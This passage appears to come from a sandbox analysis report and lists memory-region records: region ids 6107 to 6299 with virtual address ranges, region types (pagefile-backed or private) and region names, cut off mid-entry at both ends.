1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6107 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6108 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6109 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6111 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6112 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6113 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6114 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6115 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6116 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6117 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6118 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6119 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6120 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6121 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6122 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6123 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6124 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6125 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6126 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6127 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6128 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6129 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6131 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6132 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6133 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6134 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6135 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6136 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6137 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6138 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6139 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6140 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6141 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6142 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6143 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6144 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6145 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6146 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6147 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6148 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6149 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6150 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6151 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6152 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6153 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6154 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6155 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6156 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6157 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6158 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6159 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6160 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6161 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6162 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6163 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6164 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6165 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6166 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6167 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6168 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6169 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6170 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6171 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6172 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6173 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6174 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6175 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6176 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6177 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6178 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6179 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6180 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6181 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6182 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6183 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6184 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6185 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6186 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6187 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6188 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6189 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6190 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6191 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6192 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6193 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6194 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6195 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6196 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6197 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6198 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6199 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6200 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6201 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6202 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6203 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6204 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6205 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6206 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6207 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6208 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6209 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6210 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6211 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6212 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6213 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6214 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6215 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6216 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6217 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6218 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6219 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6220 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6221 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6222 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6223 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6224 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6225 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6226 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6227 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6228 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6229 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6230 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6231 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6232 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6233 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6234 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6235 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6236 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6237 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6238 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6239 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6240 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6241 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6242 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6243 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6244 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6245 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6246 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6247 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6248 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6249 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6250 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6251 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6252 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6253 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6254 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6255 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6256 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6257 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6258 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6259 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6260 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6261 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6262 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6263 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6264 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6265 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6266 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6267 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6268 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6269 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6270 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6271 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6272 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6273 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6274 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6275 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6276 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6277 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6278 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6279 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6280 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6281 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6282 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6283 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6284 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6285 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6286 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6287 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6288 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6289 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6290 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6291 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6292 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6293 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6294 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6295 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6296 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6297 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6298 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6299 